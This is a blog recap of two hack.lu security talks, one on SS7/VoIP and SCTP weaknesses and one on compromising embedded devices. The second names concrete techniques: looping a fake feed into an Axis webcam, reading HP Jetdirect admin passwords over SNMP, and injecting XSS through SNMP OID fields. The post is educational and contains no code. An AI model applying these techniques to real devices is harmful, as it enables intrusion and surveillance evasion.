hack.lu Part #8

Welcome back to the last day of hack.lu!

First presentation was made by Philippe Langlois about the diversity of network perimeters available for companies today. Philippe was a founder of Qualis! Today everybody uses SS7 networks! Do you remember phreaking using blue boxes? SS7 was deployed by operators and prevented all phreaking activities (digital signaling .vs. CCITT). And today? What are the fraud types? SIP hacking replaced the well-known “Calling Cards” fraud. SIP accounts are used in many call shops. VoIP gateway (like Asterisk) are also nice targets for hackers. Finally, SS7 attacks were reviewed (Theft or services, control of call processing, DoS, call traffic rerouting, …). . Philippe explained the basic of SS7, which is completely new for me. He explained also the shock of culture between SS7 and IP (different teams, open technologies, …). SS7 Security is based on Message Screening (MTP3) which work like ACLs. Interesting, all antennas used by mobile networks are monitored like any other devices via solution (HPOpenView is mainly used). I skipped the slides which described how SS7 works (too early in the morning for me!) but Philippe showed how to analyze packets using a standard sniffer like Wireshark. He also talked about the SCTP protocol.
SCTP is often not blocked by firewalls: “we don’t have inside, so why filter it?” But SCTP protocol can be used to ping scan Linux boxes! (Tools exists like SCTPscan. Conclusion: VOiP tools and protocols can have a negative impact on your network security! Take care!

The second presentation covered the techniques to own embedded devices. Adrian Pastor, Senior White-hat Hacker at GNUCITIZEN presented techniques to exploit the software installed on embedded devices. Why embedded devices? Because there are usually less secured than a classic server or workstation. The web console in many cases is the easiest way to compromize a device! Adrian explained two types of attacks: Classic – without interaction with the victim user or the new generation – using an internal user as a “proxy”. Then a live hack was demonstrated against a well-known Axis webcam: A hacker can replace the standard video stream with a Flash animation played in loopback. Then the room protected by the camera can be safely visited by robbers! Adrian also explained how owned devices can be used has a hop to enter an internal network (Ex: some devices have PHP and minimal shell support). Passwords can also by easily found and reused against other internal devices (ex: SNMP communities which are often unique for all devices). Funny, some printers (HP Jetdirect) returns the admin password hex-encoded via a simple SNMP OID query!!! Once again, DNS poisoning can be used to redirect admin pages to malicious servers. UPnP is another vector for potential attacks (by default, password-less). A well-know story was the BT Home Hub! Some Wi-Fi routers are also vulnerable to predictable WEP/WPA keys or, worst, the key is labeled on the router itself! Adrian reviewed lot of examples how to own embedded devices and appliances (ex: the Aruba mobility controller or IP phones) with code examples. He spoke about new type of attacks like SNMP injection of HTTP code! The idea is simple, inject some XSS payload in OID’s like system.sysContact.0, system.sysName.0 or system.sysLocation.0! Finally, what about your ISP? Can you trust it? What does the router with your traffic? Some ISP’s perform automatic upgrades of router, which means remote access! Damn! Will DSL sniifing by the next step? Conclusions: Secure your embedded devices! Cameras, printers, …) and don’t trust them. That was a very nice presentation. Slides are available here.

Coffee break! I need caffeine!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.